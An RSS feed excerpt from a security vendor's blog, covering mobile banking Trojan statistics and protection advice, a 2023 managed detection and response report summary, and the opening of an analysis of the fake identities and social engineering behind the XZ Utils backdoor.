  736. <td>Trojan-Banker.AndroidOS.Anubis.ab</td>
  737. <td>0.00</td>
  738. <td>3.00</td>
  739. <td>+3.00</td>
  740. <td></td>
  741. </tr>
  742. <tr>
  743. <td>Trojan-Banker.AndroidOS.Agent.lv</td>
  744. <td>0.00</td>
  745. <td>1.81</td>
  746. <td>+1.81</td>
  747. <td></td>
  748. </tr>
  749. <tr>
  750. <td>Trojan-Banker.AndroidOS.Agent.ep</td>
  751. <td>4.17</td>
  752. <td>1.74</td>
  753. <td>-2.44</td>
  754. <td>-4</td>
  755. </tr>
  756. <tr>
  757. <td>Trojan-Banker.AndroidOS.Mamont.c</td>
  758. <td>0.00</td>
  759. <td>1.67</td>
  760. <td>+1.67</td>
  761. <td></td>
  762. </tr>
  763. </tbody>
  764. </table>
  765. <p><em>* Unique users who encountered this malware as a percentage of all Kaspersky mobile security users who encountered banking threats.</em></p>
  766. <h3 id="geography-of-the-attacked-mobile-users">Geography of the attacked mobile users</h3>
  767. <p>To find out which countries were worst affected by mobile financial malware in 2023, we calculated the percentage of users who encountered mobile banking Trojans among all active Kaspersky users in the country. Users in Turkey were attacked the most at 2.98%, with Saudi Arabia coming in second at 1.43% and Spain (1.38%) in third place.</p>
  768. <p>TOP 10 countries by number of users who encountered mobile banking malware, 2023:</p>
  769. <table width="100%">
  770. <tbody>
  771. <tr>
  772. <td width="70%"><strong>Country*</strong></td>
  773. <td width="30%"><strong>%**</strong></td>
  774. </tr>
  775. <tr>
  776. <td>Turkey</td>
  777. <td>2.98%</td>
  778. </tr>
  779. <tr>
  780. <td>Saudi Arabia</td>
  781. <td>1.43%</td>
  782. </tr>
  783. <tr>
  784. <td>Spain</td>
  785. <td>1.38%</td>
  786. </tr>
  787. <tr>
  788. <td>Switzerland</td>
  789. <td>1.28%</td>
  790. </tr>
  791. <tr>
  792. <td>India</td>
  793. <td>0.60%</td>
  794. </tr>
  795. <tr>
  796. <td>Japan</td>
  797. <td>0.52%</td>
  798. </tr>
  799. <tr>
  800. <td>Italy</td>
  801. <td>0.42%</td>
  802. </tr>
  803. <tr>
  804. <td>South Korea</td>
  805. <td>0.39%</td>
  806. </tr>
  807. <tr>
  808. <td>Azerbaijan</td>
  809. <td>0.24%</td>
  810. </tr>
  811. <tr>
  812. <td>Colombia</td>
  813. <td>0.24%</td>
  814. </tr>
  815. </tbody>
  816. </table>
  817. <p><em>* Countries and territories with relatively few (under 25,000) Kaspersky mobile security users have been excluded from the rankings.</em><br />
  818. <em>** Unique users attacked by mobile banking Trojans as a percentage of all Kaspersky mobile security users in the country.</em></p>
  819. <h2 id="conclusion">Conclusion</h2>
820. <p>Although the number of users affected by PC banking malware continues to decline, other financial threats underscore the need to stay vigilant and protect your digital assets. Unlike in 2022, in 2023 the number of users encountering mobile banking Trojans increased significantly. Cryptocurrency-related phishing and scams continued to grow, too, and they are not expected to stop in the near future.</p>
  821. <p>To protect your devices and finance-related accounts:</p>
  822. <ul>
  823. <li>Use secure authentication methods, such as multifactor authentication, strong unique passwords, and so on.</li>
  824. <li>Do not follow links from suspicious messages, and do not enter your credentials or payment details, unless you are 200% sure that the website is legitimate.</li>
825. <li>Download apps only from trusted sources, such as official app marketplaces.</li>
  826. <li>Use reliable <a href="https://www.kaspersky.com/premium" target="_blank" rel="noopener">security solutions</a> capable of preventing both malware and phishing attacks.</li>
  827. </ul>
  828. <p>To protect your business:</p>
  829. <ul>
  830. <li>Regularly update your software and install security patches in a timely manner.</li>
  831. <li>Improve your employees&#8217; security awareness, conduct regular security training and encourage safe practices, such as proper account protection.</li>
  832. <li>Implement robust monitoring and endpoint security to detect and mitigate threats at an early stage.</li>
  833. <li>Implement network segmentation and default deny policies for users with access to financial assets.</li>
  834. <li>Stay aware of the latest cybercrime trends by obtaining threat intelligence from trusted sources and sharing it with industry partners.</li>
  835. </ul>
  836. ]]></content:encoded>
  837. <wfw:commentRss>https://securelist.com/financial-threat-report-2023/112526/feed/</wfw:commentRss>
  838. <slash:comments>0</slash:comments>
  839. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-scaled.jpg" width="2618" height="1527"><media:keywords>full</media:keywords></media:content>
  840. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-1024x597.jpg" width="1024" height="597"><media:keywords>large</media:keywords></media:content>
  841. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-300x175.jpg" width="300" height="175"><media:keywords>medium</media:keywords></media:content>
  842. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/06082310/sl-blue-currencies-map-financial-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  843. </item>
  844. <item>
  845. <title>Managed Detection and Response in 2023</title>
  846. <link>https://securelist.com/kaspersky-mdr-report-2023/112411/</link>
  847. <comments>https://securelist.com/kaspersky-mdr-report-2023/112411/#respond</comments>
  848. <dc:creator><![CDATA[Kaspersky Security Services]]></dc:creator>
  849. <pubDate>Tue, 30 Apr 2024 09:00:40 +0000</pubDate>
  850. <category><![CDATA[SOC, TI and IR posts]]></category>
  851. <category><![CDATA[Industrial threats]]></category>
  852. <category><![CDATA[Internal Threats Statistics]]></category>
  853. <category><![CDATA[MDR]]></category>
  854. <category><![CDATA[Security services]]></category>
  855. <category><![CDATA[Security technology]]></category>
  856. <category><![CDATA[Targeted attacks]]></category>
  857. <category><![CDATA[Internal threats]]></category>
  858. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112411</guid>
  859.  
  860. <description><![CDATA[The report covers the tactics, techniques and tools most commonly deployed by threat actors, the nature of incidents detected and their distribution among MDR customers.]]></description>
  861. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">Managed Detection and Response in 2023 (PDF)</a></p>
  862. <p>Alongside other security solutions, we provide Kaspersky Managed Detection and Response (MDR) to organizations worldwide, delivering expert monitoring and incident response 24/7. The task involves collecting telemetry for analysis by both machine-learning (ML) technologies and our dedicated Security Operations Center (SOC). On detection of a security incident, SOC puts forward a response plan, which, if approved by the customer, is actioned at the endpoint protection level. In addition, our experts give recommendations on organizing incident investigation and response.</p>
  863. <p>In the annual MDR report, we present the results of analysis of SOC-detected incidents, supplying answers to the following questions:</p>
  864. <ul>
  865. <li>Who are your potential attackers?</li>
  866. <li>How do they currently operate?</li>
867. <li>How can their actions be detected?</li>
  868. </ul>
  869. <p>The report covers the tactics, techniques and tools most commonly used by threat actors, the nature of high-severity incidents and their distribution among MDR customers by geography and industry.</p>
  870. <h2 id="security-incident-statistics-for-2023">Security incident statistics for 2023</h2>
  871. <h3 id="security-events">Security events</h3>
  872. <p>In 2023, Kaspersky Managed Detection and Response handled more than 431,000 alerts about possible suspicious activity. Of these, more than 117,000 were analyzed by ML technologies, and over 314,000 by SOC analysts. Of the manually processed security events, slightly under 90% turned out to be false positives. What is more, around 32,000 security alerts were linked to approximately 14,000 incidents reported to MDR customers.</p>
  873. <h3 id="geographic-distribution-of-users">Geographic distribution of users</h3>
  874. <p>In 2023, the largest concentration of Kaspersky MDR customers was in the European region (38%). In second place came Russia and the CIS (28%), in third the Asia-Pacific region (16%).</p>
  875. <div id="attachment_112506" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112506" class="size-large wp-image-112506" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg" alt="Distribution of Kaspersky MDR customers by region, 2023" width="1024" height="508" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1024x508.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-300x149.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-768x381.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-1536x762.jpeg 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-705x350.jpeg 705w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-740x367.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-564x280.jpeg 564w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01-800x397.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142416/MDR_report_2023_Global_01.jpeg 1640w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112506" class="wp-caption-text">Distribution of Kaspersky MDR customers by region, 2023</p></div>
  876. <h3 id="distribution-of-incidents-by-industry">Distribution of incidents by industry</h3>
877. <p>Since the number of incidents largely depends on the scale of monitoring, the most objective picture is given by the ratio of the number of incidents to the number of monitored endpoints. The diagram below shows the expected number of incidents of a given criticality per 10,000 endpoints, broken down by industry.</p>
  878. <div id="attachment_112507" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112507" class="size-large wp-image-112507" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg" alt="Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-1024x683.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-300x200.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-768x512.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-525x350.jpeg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-740x494.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-420x280.jpeg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02-800x534.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142450/MDR_report_2023_Global_02.jpeg 1181w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112507" class="wp-caption-text">Expected number of incidents of varying degrees of criticality per 10,000 endpoints in different industries, 2023</p></div>
  879. <p>In 2023, the most incidents per 10,000 devices were detected in mass media organizations, development companies and government agencies.</p>
880. <p>In absolute terms, the largest number of incidents worldwide in 2023 was recorded in the financial sector (18.3%), industrial enterprises (16.9%) and government agencies (12.5%).</p>
  881. <div id="attachment_112508" style="width: 1034px" class="wp-caption aligncenter"><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg" class="magnificImage"><img loading="lazy" decoding="async" aria-describedby="caption-attachment-112508" class="size-large wp-image-112508" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg" alt="Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023" width="1024" height="524" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-1024x524.jpeg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-300x153.jpeg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-768x393.jpeg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-685x350.jpeg 685w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-740x378.jpeg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-548x280.jpeg 548w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03-800x409.jpeg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27142523/MDR_report_2023_Global_03.jpeg 1508w" sizes="(max-width: 1024px) 100vw, 1024px" /></a><p id="caption-attachment-112508" class="wp-caption-text">Distribution of the number of Kaspersky MDR customers, all identified incidents and critical incidents by industry, 2023</p></div>
  882. <h2 id="general-observations-and-recommendations">General observations and recommendations</h2>
  883. <p>Based on the analysis of incidents detected in 2023, and on our many years of experience, we can identify the following trends in security incidents and protection measures:</p>
  884. <ul>
  885. <li>Every year we identify targeted attacks carried out with direct human involvement. To effectively detect such attacks, besides conventional security monitoring, threat hunting is required.</li>
  886. <li>The effectiveness of the defense mechanisms deployed by enterprises is best measured by a range of offensive exercises. Year after year, we see rising interest in projects of this kind.</li>
  887. <li>In 2023, we identified fewer high-severity malware incidents than in previous years, but the number of incidents of medium and low criticality increased. The most effective approach to guarding against such incidents is through multi-layered protection.</li>
  888. <li>Leveraging the MITRE ATT&amp;CK<sup>®</sup> knowledge base supplies additional contextual information for attack detection and investigation teams. Even the most sophisticated attacks consist of simple steps and techniques, with detection of just a single step often uncovering the entire attack.</li>
  889. </ul>
  890. <p>Detailed information about attacker tactics, techniques and tools, incident detection and response statistics, and defense recommendations can be found in the <a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/03142303/Kaspersky_MDR_Report_Eng_2023_01.pdf" target="_blank" rel="noopener">full report (PDF)</a>.</p>
  891. ]]></content:encoded>
  892. <wfw:commentRss>https://securelist.com/kaspersky-mdr-report-2023/112411/feed/</wfw:commentRss>
  893. <slash:comments>0</slash:comments>
  894. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue.jpg" width="2449" height="1632"><media:keywords>full</media:keywords></media:content>
  895. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-1024x682.jpg" width="1024" height="682"><media:keywords>large</media:keywords></media:content>
  896. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-300x200.jpg" width="300" height="200"><media:keywords>medium</media:keywords></media:content>
  897. <media:content xmlns:media="http://search.yahoo.com/mrss/" url="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/27175723/sl-security-alert-incident-blue-150x150.jpg" width="150" height="150"><media:keywords>thumbnail</media:keywords></media:content>
  898. </item>
  899. <item>
  900. <title>Assessing the Y, and How, of the XZ Utils incident</title>
  901. <link>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/</link>
  902. <comments>https://securelist.com/xz-backdoor-story-part-2-social-engineering/112476/#comments</comments>
  903. <dc:creator><![CDATA[GReAT]]></dc:creator>
  904. <pubDate>Wed, 24 Apr 2024 10:10:31 +0000</pubDate>
  905. <category><![CDATA[Incidents]]></category>
  906. <category><![CDATA[Linux]]></category>
  907. <category><![CDATA[Social engineering]]></category>
  908. <category><![CDATA[Supply-chain attack]]></category>
  909. <category><![CDATA[Targeted attacks]]></category>
  910. <category><![CDATA[XZ]]></category>
  911. <category><![CDATA[APT (Targeted attacks)]]></category>
  912. <guid isPermaLink="false">https://kasperskycontenthub.com/securelist/?p=112476</guid>
  913.  
  914. <description><![CDATA[In this article we analyze social engineering aspects of the XZ backdoor incident. Namely pressuring the XZ maintainer to pass on the project to Jia Cheong Tan, and then urging major downstream maintainers to commit the backdoored code to their projects.]]></description>
  915. <content:encoded><![CDATA[<p><img width="990" height="400" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23205014/sl-dark-sillouettes-laptops-binary-background-green-990x400.jpg" class="attachment-securelist-huge-promo size-securelist-huge-promo wp-post-image" alt="" decoding="async" loading="lazy" /></p><p>High-end APT groups perform highly interesting social engineering campaigns in order to penetrate well-protected targets. For example, carefully constructed forum responses on precision targeted accounts and follow-up &#8220;out-of-band&#8221; interactions regarding underground rail system simulator software helped deliver <a href="https://securelist.com/unraveling-the-lamberts-toolkit/77990/#green-lambert" target="_blank" rel="noopener">Green Lambert</a> implants in the Middle East. And, in what seems to be a learned approach, the <a href="https://tukaani.org/xz-backdoor/" target="_blank" rel="noopener">XZ Utils project penetration</a> was likely a patient, multi-year approach, both planned in advance but somewhat clumsily executed.</p>
  916. <p>This recently exposed offensive effort slowly introduced a small cast of remote characters, communications, and malicious code to the more than decade old open-source project XZ Utils and its maintainer, Lasse Collin. The backdoor code was inserted in February and March 2024, mostly by Jia Cheong Tan, likely a fictitious identity. The end goal was to covertly implement an exclusive use backdoor in sshd by targeting the XZ Utils build process, and push the backdoored code to the major Linux distributions as a part of a large-scale supply chain attack.</p>
  917. <p>While this highly targeted and interactive social engineering approach might not be completely novel, it is extraordinary. Also extraordinary is the stunningly subtle insertion of malicious code leveraging the build process in plain sight. This build process focus during a major supply chain attack is comparable only to the CozyDuke/DarkHalo/APT29/NOBELIUM <a href="https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" target="_blank" rel="noopener">Solarwinds compromise</a> and the <a href="https://www.crowdstrike.com/blog/sunspot-malware-technical-analysis/" target="_blank" rel="noopener">SUNSPOT</a> implant&#8217;s cunning and persistent presence – its monitoring capability for the execution of a Solarwinds build, and its malicious code insertion during any Solarwinds build execution. Only this time, it&#8217;s human involvement in the build process.</p>
  918. <p>It&#8217;s notable that one of the key differentiators of the Solarwinds incident from prior supply chain attacks was the adversary&#8217;s covert, prolonged access to the source/development environment. In this XZ Utils incident, this prolonged access was obtained via social engineering and extended with fictitious human identity interactions in plain sight.</p>
  919. <p>One of the best <a href="https://research.swtch.com/xz-timeline" target="_blank" rel="noopener">publicly available chronological timelines</a> on the social engineering side of the XZ Utils incident is posted by Russ Cox, currently a Google researcher. It&#8217;s highly recommended reading. Notably, Cox writes: &#8220;This post is a detailed timeline that I have constructed of the social engineering aspect of the attack, which appears to date back to late 2021.&#8221;</p>
  920. <h2 id="a-singaporean-guy-an-indian-guy-and-a-german-guy-walk-into-a-bar">A Singaporean guy, an Indian guy, and a German guy walk into a bar…</h2>
  921. <p>Three identities pressure XZ Utils creator and maintainer Lasse Collin in summer 2022 to provoke an open-source code project handover: Jia Tan/Jia Cheong Tan, Dennis Ens, and Jigar Kumar. These identities are made up of a GitHub account, three free email accounts with similar name schemes, an IRC and Ubuntu One account, email communications on XZ Utils <a href="https://www.mail-archive.com/xz-devel@tukaani.org/" target="_blank" rel="noopener">developer mailing lists</a> and downstream maintainers, and code. Their goal was to grant full access to XZ Utils source code to Jia Tan and subtly introduce malicious code into XZ Utils – the identities even interact with one another on mail threads, complaining about the need to replace Lasse Collin as the XZ Utils maintainer.</p>
  922. <p>Note that the geographic dispersion of fictitious identities is a bit forced here, perhaps to dispel hints of coordination: Singaporean or Malaysian (possibly of a Hokkien dialect), northern European, and Indian. Misspellings and grammar mistakes are similar across the three identities&#8217; communications. The &#8220;Jia Tan&#8221; identity seems a bit forced as well – the only public geolocation data is a <a href="https://boehs.org/node/everything-i-know-about-the-xz-backdoor#:~:text=I%20received%20an%20email%20that,and%20activity%20on%20March%2029th.&amp;text=Running%20a%20Nmap%20on%20the,feel%20like%20proximity%20becomes%20plausible." target="_blank" rel="noopener">Singaporean VPN exit node</a> that the identity may have used on March 29 to access the XZ Utils Libera IRC chat. If constructing a fictitious identity, using that particular exit node would definitely be a selected resource.</p>
  923. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-112478" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png" alt="" width="911" height="337" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01.png 911w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-300x111.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-768x284.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-740x274.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-757x280.png 757w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152628/XZ_backdoor_2_social_engineering_01-800x296.png 800w" sizes="(max-width: 911px) 100vw, 911px" /></a></p>
  924. <p>Our pDNS confirms this IP as a Witopia VPN exit. While we might expect a &#8220;jiat75&#8221; or &#8220;jiatan018&#8221; username for the &#8220;Jia Tan&#8221; Libera IRC account, this one in the screenshot above may have been used on March 29, 2024 by the &#8220;JiaT75&#8221; actor.</p>
  925. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112479" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png" alt="" width="1024" height="108" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1024x108.png 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-300x32.png 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-768x81.png 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1536x162.png 1536w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-740x78.png 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-1600x169.png 1600w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02-800x85.png 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152650/XZ_backdoor_2_social_engineering_02.png 1647w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  926. <p>One additional identity, Hans Jansen, <a href="https://github.com/tukaani-project/xz/pull/53" target="_blank" rel="noopener">introduced</a> a June 2023 performance optimization into the XZ Utils source, committed by Collin, and later leveraged by JiaT75&#8217;s backdoor code. Jia Tan gleefully accepted the proposed IFUNC additions: &#8220;Thanks for the PR and the helpful links! Overall this seems like a nice improvement to our function-picking strategy for CRC64. It will likely be useful when we implement CRC32 CLMUL too :)&#8221;.</p>
  927. <p>This pull request is the Jansen identity&#8217;s only interaction with the XZ Utils project itself. And, unlike the other two identities, the Jansen account is not used to pressure Collin to turn over XZ Utils maintenance. Instead, the Hans Jansen identity provided the code and then disappeared. Nine months later, following the backdoor code insertion, Jansen urged a major Linux vendor in the supply chain to incorporate the backdoored XZ Utils code in their distribution. The identity resurfaced on a <a href="https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1067708" target="_blank" rel="noopener">Debian bug report</a> on March 24, 2024, creating an opportunity to generate urgency in including the backdoored code in the Debian distribution.</p>
  928. <h2 id="jia-tan-identity-and-activity">Jia Tan Identity and Activity</h2>
  929. <p>The Jia Cheong Tan (JiaT75) GitHub account, which inserted the malicious backdoor code and was eventually promoted to co-maintainer of XZ Utils, was created on January 26, 2021. JiaT75 was not exclusively involved in XZ Utils, having authored over 500 patches to multiple GitHub projects going back to early 2022.</p>
  930. <ul>
  931. <li>oss-fuzz</li>
  932. <li>cpp-docs</li>
  933. <li>wasmtime</li>
  934. <li>xz</li>
  935. </ul>
  936. <p>These innocuous patches helped to build the identity of JiaT75 as a legitimate open source contributor and potential maintainer for the XZ Utils project. The patch efforts helped to establish a relationship with Lasse Collin as well.</p>
  937. <p>The first JiaT75 code contribution to XZ Utils occurred on October 29, 2021. It was sent to the xz-devel mailing list. It was a very simple editor config file introduction. Following this initial innocuous addition, over the next two years, JiaT75 <a href="https://git.tukaani.org/?p=xz.git;a=search;h=HEAD;pg=4;s=jia+tan;st=author" target="_blank" rel="noopener">authored</a> hundreds of changes for the XZ project.</p>
  938. <p>Yes, JiaT75 contributed code on both weekends and what appear to be workdays. However, an interesting anomaly is that the 2024 malicious commits occur out of sync with many previous commits. A Huntress researcher going by the alias &#8220;<a href="https://x.com/birchb0y/status/1773871381890924872" target="_blank" rel="noopener">Alden</a>&#8221; posted a visualization of the malicious Jia Tan commits to XZ Utils. JiaT75 commits the malicious code completely out of sync with prior work times on Feb 23–26, and March 8 and 9, 2024.</p>
  939. <p><a href="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg" class="magnificImage"><img loading="lazy" decoding="async" class="aligncenter size-large wp-image-112480" src="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg" alt="" width="1024" height="683" srcset="https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-1024x683.jpg 1024w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-300x200.jpg 300w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-768x512.jpg 768w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-525x350.jpg 525w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-740x493.jpg 740w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-420x280.jpg 420w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03-800x533.jpg 800w, https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/04/23152744/XZ_backdoor_2_social_engineering_03.jpg 1200w" sizes="(max-width: 1024px) 100vw, 1024px" /></a></p>
  940. <p>The time differences for the malicious commits are noticeable. What might this anomaly suggest? We speculate on several possibilities:</p>
  941. <ul>
  942. <li>the JiaT75 account was used by a second party to insert the malicious code, either known or unknown to the individual contributor.</li>
  943. <li>the JiaT75 individual contributor was rushed to commit the malicious backdoor code.</li>
  944. <li>the JiaT75 account was run by a team of individuals and one part of the team needed to work without interruption outside of the usual constructed work day.</li>
  945. </ul>
  946. <p>Especially devious is the manner in which the obfuscated backdoor code is introduced in multiple separate pieces by JiaT75. Even though it was open-source, the bulk of the backdoor does not show up in the XZ source-code tree, is not human readable, and was not recognized.</p>
  947. <h2 id="summer-2022-pressure-to-add-a-maintainer">Summer 2022 Pressure to Add a Maintainer</h2>
  948. <p>Multiple identities of interest pressured Lasse Collin to add a maintainer over the summer of 2022. The intensity of pressure on Collin varies per account, but they all create opportunities to pressure Collin and interact.</p>
  949. <table width="100%">
  950. <tbody>
  951. <tr>
  952. <td width="22%"><strong>Name</strong></td>
  953. <td width="22%"><strong>GitHub Account</strong></td>
  954. <td width="34%"><strong>Email</strong></td>
  955. <td width="22%"><strong>Creation</strong></td>
  956. </tr>
  957. <tr>
  958. <td>Jia Tan/Jia Cheong Tan</td>
  959. <td>JiaT75</td>
  960. <td>jiat0218@gmail.com</td>
  961. <td>January 26, 2021</td>
  962. </tr>
  963. <tr>
  964. <td>Dennis Ens</td>
  965. <td>&#8211;</td>
  966. <td>dennis3ns@gmail.com</td>
  967. <td>&#8211;</td>
  968. </tr>
  969. <tr>
  970. <td>Jigar Kumar</td>
  971. <td>&#8211;</td>
  972. <td>jigarkumar17@protonmail.com</td>
  973. <td>&#8211;</td>
  974. </tr>
  975. </tbody>
  976. </table>
